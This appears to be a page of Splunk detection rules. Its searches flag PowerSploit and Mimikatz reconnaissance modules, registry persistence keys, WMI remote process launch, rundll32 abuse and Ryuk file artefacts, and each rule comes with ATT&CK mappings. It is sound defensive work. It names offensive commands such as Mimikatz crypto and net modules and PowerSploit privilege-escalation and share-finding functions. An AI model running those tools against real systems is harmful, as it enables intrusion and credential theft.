| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Get-DomainSID/)=true OR match_regex(cmd_line, /(?i)Get-DomainSite/)=true OR match_regex(cmd_line, /(?i)Get-NetSite/)=true OR match_regex(cmd_line, /(?i)Get-DomainSubnet/)=true OR match_regex(cmd_line, /(?i)Get-NetSubnet/)=true OR match_regex(cmd_line, /(?i)Get-DomainTrust/)=true OR match_regex(cmd_line, /(?i)Get-NetDomainTrust/)=true OR match_regex(cmd_line, /(?i)Get-DomainTrustMapping/)=true OR match_regex(cmd_line, /(?i)Invoke-MapDomainTrust/)=true OR match_regex(cmd_line, /(?i)Get-Forest/)=true OR match_regex(cmd_line, /(?i)Get-NetForest/)=true OR match_regex(cmd_line, /(?i)Get-ForestDomain/)=true OR match_regex(cmd_line, /(?i)Get-NetForestDomain/)=true OR match_regex(cmd_line, /(?i)Get-ForestGlobalCatalog/)=true OR match_regex(cmd_line, /(?i)Get-NetForestCatalog/)=true OR match_regex(cmd_line, /(?i)Get-ForestTrust/)=true OR match_regex(cmd_line, /(?i)Get-NetForestTrust/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1199 Trusted Relationship Initial Access
T1482 Domain Trust Discovery Discovery
T1590 Gather Victim Network Information Reconnaissance
T1591 Gather Victim Org Information Reconnaissance
T1595 Active Scanning Reconnaissance


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance and access to computers and domains via powersploit modules

This detection identifies access to PowerSploit modules that discover computers, servers and domains that can be accessed or taken over.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1592, T1590, T1087
  • Last Updated: 2020-11-06

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Get-ComputerDetail/)=true OR match_regex(cmd_line, /(?i)Get-Domain/)=true OR match_regex(cmd_line, /(?i)Get-NetDomain/)=true OR match_regex(cmd_line, /(?i)Get-DomainComputer/)=true OR match_regex(cmd_line, /(?i)Get-NetComputer/)=true OR match_regex(cmd_line, /(?i)Get-DomainController/)=true OR match_regex(cmd_line, /(?i)Get-NetDomainController/)=true OR match_regex(cmd_line, /(?i)Get-DomainFileServer/)=true OR match_regex(cmd_line, /(?i)Get-NetFileServer/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1592 Gather Victim Host Information Reconnaissance
T1590 Gather Victim Network Information Reconnaissance
T1087 Account Discovery Discovery


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance and access to computers via mimikatz modules

This detection identifies use of Mimikatz modules for discovery of computers and servers and access to them.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1592
  • Last Updated: 2020-11-06

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)net::ServerInfo/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1592 Gather Victim Host Information Reconnaissance


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance and access to operating system elements via powersploit modules

This detection identifies access to PowerSploit modules that discover and access operating system elements, such as processes, services, registry locations, security packages and files.

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Find-DomainProcess/)=true OR match_regex(cmd_line, /(?i)Invoke-ProcessHunter/)=true OR match_regex(cmd_line, /(?i)Get-ServiceDetail/)=true OR match_regex(cmd_line, /(?i)Get-WMIProcess/)=true OR match_regex(cmd_line, /(?i)Get-NetProcess/)=true OR match_regex(cmd_line, /(?i)Get-SecurityPackage/)=true OR match_regex(cmd_line, /(?i)Find-DomainObjectPropertyOutlier/)=true OR match_regex(cmd_line, /(?i)Get-DomainObject/)=true OR match_regex(cmd_line, /(?i)Get-ADObject/)=true OR match_regex(cmd_line, /(?i)Get-WMIRegMountedDrive/)=true OR match_regex(cmd_line, /(?i)Get-RegistryMountedDrive/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1007 System Service Discovery Discovery
T1012 Query Registry Discovery
T1046 Network Service Scanning Discovery
T1047 Windows Management Instrumentation Execution
T1057 Process Discovery Discovery
T1083 File and Directory Discovery Discovery
T1518 Software Discovery Discovery
T1592.002 Software Reconnaissance


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance and access to processes and services via mimikatz modules

This detection identifies use of Mimikatz modules for discovery and access to services and processes.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1007, T1046, T1057
  • Last Updated: 2020-11-06

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)process::list/)=true OR match_regex(cmd_line, /(?i)service::list/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1007 System Service Discovery Discovery
T1046 Network Service Scanning Discovery
T1057 Process Discovery Discovery


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance and access to shared resources via mimikatz modules

This detection identifies use of Mimikatz modules for discovery and access to network shares.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1021.002, T1135, T1039
  • Last Updated: 2020-11-06

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)net::share/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1021.002 SMB/Windows Admin Shares Lateral Movement
T1135 Network Share Discovery Discovery
T1039 Data from Network Shared Drive Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance and access to shared resources via powersploit modules

This detection identifies access to PowerSploit modules that discover and access network and distributed file system shares.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1021.002, T1135, T1039
  • Last Updated: 2020-11-06

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Find-DomainShare/)=true OR match_regex(cmd_line, /(?i)Invoke-ShareFinder/)=true OR match_regex(cmd_line, /(?i)Find-InterestingDomainShareFile/)=true OR match_regex(cmd_line, /(?i)Invoke-FileFinder/)=true OR match_regex(cmd_line, /(?i)Find-InterestingFile/)=true OR match_regex(cmd_line, /(?i)Get-DomainDFSShare/)=true OR match_regex(cmd_line, /(?i)Get-DFSshare/)=true OR match_regex(cmd_line, /(?i)Get-NetShare/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1021.002 SMB/Windows Admin Shares Lateral Movement
T1135 Network Share Discovery Discovery
T1039 Data from Network Shared Drive Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance of access and persistence opportunities via powersploit modules

This detection identifies use of PowerSploit modules that discover opportunities for malicious access and persistence. Some examples include access to admin accounts, weak access control policies, landing paths for dropping malicious software or data to exfiltrate, registry locations to land autorun parameters, task scheduling opportunities, as well as services and system files that can be compromised.

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Find-LocalAdminAccess/)=true OR match_regex(cmd_line, /(?i)Find-InterestingDomainAcl/)=true OR match_regex(cmd_line, /(?i)Invoke-ACLScanner/)=true OR match_regex(cmd_line, /(?i)Find-PathDLLHijack/)=true OR match_regex(cmd_line, /(?i)Find-ProcessDLLHijack/)=true OR match_regex(cmd_line, /(?i)Get-DomainObjectAcl/)=true OR match_regex(cmd_line, /(?i)Get-ObjectAcl/)=true OR match_regex(cmd_line, /(?i)Get-DomainPolicy/)=true OR match_regex(cmd_line, /(?i)Get-ModifiablePath/)=true OR match_regex(cmd_line, /(?i)Get-ModifiableRegistryAutoRun/)=true OR match_regex(cmd_line, /(?i)Get-ModifiableScheduledTaskFile/)=true OR match_regex(cmd_line, /(?i)Get-ModifiableService/)=true OR match_regex(cmd_line, /(?i)Get-ModifiableServiceFile/)=true OR match_regex(cmd_line, /(?i)Get-PathAcl/)=true OR match_regex(cmd_line, /(?i)Get-UnattendedInstallFile/)=true OR match_regex(cmd_line, /(?i)Get-UnquotedService/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1053 Scheduled Task/Job Execution, Persistence, Privilege Escalation
T1068 Exploitation for Privilege Escalation Privilege Escalation
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation
T1543 Create or Modify System Process Persistence, Privilege Escalation
T1547 Boot or Logon Autostart Execution Persistence, Privilege Escalation
T1574 Hijack Execution Flow Defense Evasion, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance of connectivity via powersploit modules

This detection identifies access to PowerSploit modules for reconnaissance of connectivity.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1021.002, T1135, T1039
  • Last Updated: 2020-11-06

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Get-DomainDNSRecord/)=true OR match_regex(cmd_line, /(?i)Get-DNSRecord/)=true OR match_regex(cmd_line, /(?i)Get-DomainDNSZone/)=true OR match_regex(cmd_line, /(?i)Get-DNSZone/)=true OR match_regex(cmd_line, /(?i)Invoke-ReverseDnsLookup/)=true OR match_regex(cmd_line, /(?i)Get-WMIRegCachedRDPConnection/)=true OR match_regex(cmd_line, /(?i)Get-CachedRDPConnection/)=true OR match_regex(cmd_line, /(?i)Get-WMIRegProxy/)=true OR match_regex(cmd_line, /(?i)Get-Proxy/)=true OR match_regex(cmd_line, /(?i)Invoke-Portscan/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1021.002 SMB/Windows Admin Shares Lateral Movement
T1135 Network Share Discovery Discovery
T1039 Data from Network Shared Drive Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance of credential stores and services via mimikatz modules

This detection identifies reconnaissance of credential stores and use of CryptoAPI services by Mimikatz modules.

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)crypto::capi/)=true OR match_regex(cmd_line, /(?i)crypto::cng/)=true OR match_regex(cmd_line, /(?i)crypto::providers/)=true OR match_regex(cmd_line, /(?i)crypto::stores/)=true OR match_regex(cmd_line, /(?i)crypto::sc/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1589.001 Credentials Reconnaissance
T1590.001 Domain Properties Reconnaissance
T1590.003 Network Trust Dependencies Reconnaissance
T1068 Exploitation for Privilege Escalation Privilege Escalation
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation
T1098 Account Manipulation Persistence


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance of defensive tools via powersploit modules

This detection identifies use of PowerSploit modules for assessment of presence of defensive tools.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1595.002, T1592.002
  • Last Updated: 2020-11-05

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Find-AVSignature/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1595.002 Vulnerability Scanning Reconnaissance
T1592.002 Software Reconnaissance


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance of privilege escalation opportunities via powersploit modules

This detection identifies use of PowerSploit modules for assessment of privilege escalation opportunities.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1068, T1078, T1098
  • Last Updated: 2020-11-05

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Invoke-PrivescAudit/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1068 Exploitation for Privilege Escalation Privilege Escalation
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation
T1098 Account Manipulation Persistence


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reconnaissance of process or service hijacking opportunities via mimikatz modules

This detection identifies use of Mimikatz modules for discovery of process or service hijacking opportunities via Microsoft Detours compatibility. Microsoft Detours is an open source library for intercepting, monitoring and instrumenting binary functions on Microsoft Windows. Detours intercepts Win32 functions by re-writing the in-memory code for target functions. The Detours package also contains utilities to attach arbitrary DLLs and data segments called payloads to any Win32 binary.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1543, T1055, T1574
  • Last Updated: 2020-11-05

Search

| from read_ssa_enriched_events() | eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)), cmd_line=ucast(map_get(input_event, "process"), "string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)misc::detours/)=true ) | eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event, "dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"), "string", null)), body = "TBD" | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

You must be ingesting Windows Security logs from devices of interest, including the event ID 4688 with enabled command line logging.

Required field

  • _time
  • process
  • dest_device_id
  • dest_user_id


ATT&CK

ID Technique Tactic
T1543 Create or Modify System Process Persistence, Privilege Escalation
T1055 Process Injection Defense Evasion, Privilege Escalation
T1574 Hijack Execution Flow Defense Evasion, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset

version: 1


Reg exe manipulating windows services registry keys

The search looks for reg.exe modifying registry keys that define Windows services and their configurations.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1574.011
  • Last Updated: 2020-11-26

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Processes.process_name) as process_name values(Processes.parent_process_name) as parent_process_name values(Processes.user) as user FROM datamodel=Endpoint.Processes where Processes.process_name=reg.exe Processes.process=*reg* Processes.process=*add* Processes.process=*Services* by Processes.process_id Processes.dest Processes.process | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `reg_exe_manipulating_windows_services_registry_keys_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the endpoint data model in the registry node. This is typically populated via endpoint detection-and-response product, such as Carbon Black or endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report reads and writes to the registry.

Required field

ATT&CK

ID Technique Tactic
T1574.011 Services Registry Permissions Weakness Defense Evasion, Persistence, Privilege Escalation


Kill Chain Phase

  • Installation


Known False Positives

It is unusual for a service to be created or modified by directly manipulating the registry. However, there may be legitimate instances of this behavior. It is important to validate and investigate, as appropriate.

Reference

Test Dataset


version: 5


Registry keys used for persistence

The search looks for modifications to registry keys that can be used to launch an application or service at system startup.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1547.001
  • Last Updated: 2020-11-27

Search

| tstats `security_content_summariesonly` count values(Registry.registry_key_name) as registry_key_name values(Registry.registry_path) as registry_path min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where (Registry.registry_path=*currentversion\\run* OR Registry.registry_path=*currentVersion\\Windows\\Appinit_Dlls* OR Registry.registry_path=CurrentVersion\\Winlogon\\Shell* OR Registry.registry_path=*CurrentVersion\\Winlogon\\Userinit* OR Registry.registry_path=*CurrentVersion\\Winlogon\\VmApplet* OR Registry.registry_path=*currentversion\\policies\\explorer\\run* OR Registry.registry_path=*currentversion\\runservices* OR Registry.registry_path=*\\CurrentControlSet\\Control\\Lsa\\* OR Registry.registry_path="*Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options*" OR Registry.registry_path=HKLM\\SOFTWARE\\Microsoft\\Netsh\\*) by Registry.dest Registry.user | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Registry)` | `registry_keys_used_for_persistence_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the endpoint data model in the registry node. This is typically populated via endpoint detection-and-response product, such as Carbon Black or endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report reads and writes to the registry.

Required field

ATT&CK

ID Technique Tactic
T1547.001 Registry Run Keys / Startup Folder Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

There are many legitimate applications that must execute on system startup and will use these registry keys to accomplish that task.

Reference

Test Dataset


version: 5


Registry keys used for privilege escalation

This search looks for modifications to registry keys that can be used to elevate privileges. The registry keys under "Image File Execution Options" are used to intercept calls to an executable and can be used to attach malicious binaries to benign system binaries.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1546.012
  • Last Updated: 2020-11-27

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where (Registry.registry_path="*Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options*") AND (Registry.registry_key_name=GlobalFlag OR Registry.registry_key_name=Debugger) by Registry.dest Registry.user Registry.registry_path Registry.registry_key_name | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Registry)` | `registry_keys_used_for_privilege_escalation_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the endpoint data model in the registry node. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report reads and writes to the registry.

Required field

ATT&CK

ID Technique Tactic
T1546.012 Image File Execution Options Injection Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

There are many legitimate applications that must execute upon system startup and will use these registry keys to accomplish that task.

Reference


Test Dataset


version: 4


Registry keys for creating shim databases

This search looks for registry activity associated with application compatibility shims, which can be leveraged by attackers for various nefarious purposes.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1546.011
  • Last Updated: 2020-11-26

Search

| tstats `security_content_summariesonly` count values(Registry.registry_key_name) as registry_key_name min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path=*CurrentVersion\\AppCompatFlags\\Custom* OR Registry.registry_path=*CurrentVersion\\AppCompatFlags\\InstalledSDB* by Registry.dest Registry.user | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Registry)` | `registry_keys_for_creating_shim_databases_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must populate the Change_Analysis data model. This is typically populated via endpoint detection and response product, such as Carbon Black or other endpoint data sources such as Sysmon. The data used for this search is typically generated via logs that report reads and writes to the registry.

Required field

ATT&CK

ID Technique Tactic
T1546.011 Application Shimming Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

There are many legitimate applications that leverage shim databases for compatibility purposes for legacy applications

Reference

Test Dataset


version: 3


Remote desktop process running on system

This search looks for the remote desktop process mstsc.exe running on systems upon which it doesn't typically run. This is accomplished by filtering out all systems that are noted in the `common_rdp_source category` in the Assets and Identity framework.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1021.001
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process=*mstsc.exe AND Processes.dest_category!=common_rdp_source by Processes.dest Processes.user Processes.process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | `remote_desktop_process_running_on_system_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records process activity from your hosts to populate the endpoint data model in the processes node. The search requires you to identify systems that do not commonly use remote desktop. You can use the included support search "Identify Systems Using Remote Desktop" to identify these systems. After identifying them, you will need to add the "common_rdp_source" category to that system using the Enterprise Security Assets and Identities framework. This can be done by adding an entry in the assets.csv file located in `SA-IdentityManagement/lookups`.

Required field

ATT&CK

ID Technique Tactic
T1021.001 Remote Desktop Protocol Lateral Movement


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Remote Desktop may be used legitimately by users on the network.

Reference

Test Dataset

version: 5


Remote process instantiation via wmi

This search looks for wmic.exe being launched with parameters to spawn a process on a remote system.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1047
  • Last Updated: 2020-11-30

Search

| tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = wmic.exe Processes.process="*/node*" Processes.process="*process*" Processes.process="*call*" Processes.process="*create*" by Processes.process_name Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `remote_process_instantiation_via_wmi_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1047 Windows Management Instrumentation Execution


Kill Chain Phase

  • Actions on Objectives


Known False Positives

The wmic.exe utility is a benign Windows application. It may be used legitimately by Administrators with these parameters for remote system administration, but it's relatively uncommon.

Reference

Test Dataset


version: 5


Rundll loading dll by ordinal

This search looks for executing scripts with rundll32. Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly, may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.011
  • Last Updated: 2020-11-30

Search

| tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = rundll32.exe by Processes.process_name Processes.parent_process_name Processes.process Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `rundll_loading_dll_by_ordinal_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1218.011 Rundll32 Defense Evasion


Kill Chain Phase

  • Installation


Known False Positives

While not common, loading a DLL under %AppData% and calling a function by ordinal is possible by a legitimate process

Reference

Test Dataset


version: 4


Ryuk test files detected

The search looks for files that contain the key word *Ryuk* under any folder in the C drive, which is consistent with Ryuk propagation.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1486
  • Last Updated: 2020-11-06

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem WHERE "Filesystem.file_path"=C:\\*Ryuk* BY "Filesystem.dest", "Filesystem.user", "Filesystem.file_path" | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `ryuk_test_files_detected_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records the filesystem activity from your hosts to populate the Endpoint Filesystem data-model object. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data.

Required field

ATT&CK

ID Technique Tactic
T1486 Data Encrypted for Impact Impact


Kill Chain Phase

  • Delivery


Known False Positives

If there are files with this keywoord as file names it might trigger false possitives, please make use of our filters to tune out potential FPs.

Reference

Test Dataset


version: 1


Samsam test file write

The search looks for a file named "test.txt" written to the windows system directory tree, which is consistent with Samsam propagation.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
